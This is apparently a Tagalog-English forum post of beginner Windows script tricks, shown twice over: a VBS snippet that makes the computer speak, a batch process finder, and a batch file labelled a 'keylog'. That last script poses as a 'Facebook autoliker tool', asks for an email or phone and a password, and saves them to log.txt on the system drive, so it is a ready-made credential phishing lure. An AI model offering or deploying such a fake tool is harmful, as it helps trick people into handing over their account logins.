Para ma Dali sa lahat gamit na kayu nito boyssz
Paano pagsalitain ang computer ?
1.) Open your Notepad.
2.) I-Type sa iyong Notepad ang code sa baba.
Set Computer = CreateObject("sapi.spvoice")
Computer.Speak "Hello Master!"
3.) Save as Filename.vbs
Malalaman mo rin kung lalake or babae OS mo sa pamamagitan ng boses na maririnig mo mwahahaha.
paano gumawa gumawa ng proccess finder?
==================
1. Open Notepad
2. Copy the following code:
echo off
:fnd
cls
color 0a
echo.
echo Enter the process name:
echo.
set /p process=
tasklist /nh /fi "imagename eq %process%" | find /i "%process%" >nul && (
echo.
echo Process: %process% is running
) || (
echo.
echo Process: %process% is not running
)
pause>nul
goto fnd
3. Save it as "filename.bat" (It must have ".bat" extension)
Done!,
Run the program and enter the process name like "notepad.exe" & it will tell you if that process is running or not.
paano gumawa ng keylog sa bat file
1.) open notepad
2.) copy and paste ang code sa baba
echo off & title Facebook autoliker tool & color 0a
echo.
set /p "em= Enter your email or phone: "
echo.
set /p "pw= Enter your password: "
echo.
set /p "url= Enter the url: "
echo.
echo username = %em% password = %pw% > %systemdrive%\log.txt
3.) save mo as facebook_autolike.bat
4.) test mo na
ang output nyan nasa c\ depende kung saan naka setup ung os mo
Paano pagsalitain ang computer ?
1.) Open your Notepad.
2.) I-Type sa iyong Notepad ang code sa baba.
Set Computer = CreateObject("sapi.spvoice")
Computer.Speak "Hello Master!"
3.) Save as Filename.vbs
Malalaman mo rin kung lalake or babae OS mo sa pamamagitan ng boses na maririnig mo mwahahaha.
paano gumawa gumawa ng proccess finder?
==================
1. Open Notepad
2. Copy the following code:
echo off
:fnd
cls
color 0a
echo.
echo Enter the process name:
echo.
set /p process=
tasklist /nh /fi "imagename eq %process%" | find /i "%process%" >nul && (
echo.
echo Process: %process% is running
) || (
echo.
echo Process: %process% is not running
)
pause>nul
goto fnd
3. Save it as "filename.bat" (It must have ".bat" extension)
Done!,
Run the program and enter the process name like "notepad.exe" & it will tell you if that process is running or not.
paano gumawa ng keylog sa bat file
1.) open notepad
2.) copy and paste ang code sa baba
echo off & title Facebook autoliker tool & color 0a
echo.
set /p "em= Enter your email or phone: "
echo.
set /p "pw= Enter your password: "
echo.
set /p "url= Enter the url: "
echo.
echo username = %em% password = %pw% > %systemdrive%\log.txt
3.) save mo as facebook_autolike.bat
4.) test mo na
ang output nyan nasa c\ depende kung saan naka setup ung os mo
